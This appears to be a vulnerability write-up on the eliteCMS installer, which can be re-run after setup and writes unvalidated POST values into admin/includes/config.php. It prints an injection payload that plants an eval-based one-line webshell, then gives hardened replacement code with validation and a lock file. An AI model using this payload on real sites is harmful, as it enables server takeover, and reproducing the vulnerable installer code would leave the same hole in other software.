After installation finishes, the eliteCMS installer is not locked, so an attacker can reach the installer URL and run the installation again.

A second vulnerability is that the installer can write a one-line webshell directly into admin/includes/config.php.

Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= " die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= " die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";
    $writer = fopen($file, 'w');
    ...

Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken from POST without any validation. If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line webshell backdoor is written into /admin/includes/config.php.
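For contrast, here is how the config writer for step 4 could be hardened against both issues described above: values are validated and emitted through var_export() so they can never break out of the string literal, and a lock file refuses any re-run of the installer. This is an added example, not eliteCMS's own code; the function names, the lock file path and the validation rules are assumptions.

```php
<?php
// Added example (not from eliteCMS): hardened replacement for the step-4 config writer.
// validate_db_setting(), build_config(), write_config() and the lock file are hypothetical.

function validate_db_setting(string $name, string $value): string {
    // Host, database and user names: only characters that legitimately occur in them.
    // The password is free-form but length-limited; var_export() below escapes it.
    if ($name === 'DB_PASS') {
        if (strlen($value) > 128) { throw new InvalidArgumentException("$name too long"); }
        return $value;
    }
    if (!preg_match('/^[A-Za-z0-9_.:-]{1,64}$/', $value)) {
        throw new InvalidArgumentException("$name contains invalid characters");
    }
    return $value;
}

function build_config(array $settings): string {
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        if (!isset($settings[$key])) { throw new InvalidArgumentException("missing $key"); }
        $v = validate_db_setting($key, (string) $settings[$key]);
        // var_export() yields a quoted, escaped PHP string literal; "?>" inside a
        // string literal does not end PHP mode, so the value stays data, not code.
        $out .= 'define(' . var_export($key, true) . ', ' . var_export($v, true) . ");\n";
    }
    return $out;
}

function write_config(string $file, string $lockFile, array $settings): void {
    // Refuse to run twice: the original installer could be replayed after installation.
    if (file_exists($lockFile)) {
        throw new RuntimeException('Installer already completed; remove the install directory');
    }
    if (file_put_contents($file, build_config($settings), LOCK_EX) === false) {
        throw new RuntimeException("Cannot write $file");
    }
    // Record completion so later requests to the installer are rejected.
    file_put_contents($lockFile, date('c'), LOCK_EX);
}

// Constructed input mirroring the post's payload: it is rejected instead of being written.
try {
    build_config(['DB_SERVER' => 'localhost', 'DB_NAME' => '"?><?php eval($_POST[c]);?><?php',
                  'DB_USER' => 'cms', 'DB_PASS' => 'secret']);
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}
```

Even with validation, the installer directory should be deleted or denied in the web server configuration once setup completes, since the lock file only protects the code paths that check it.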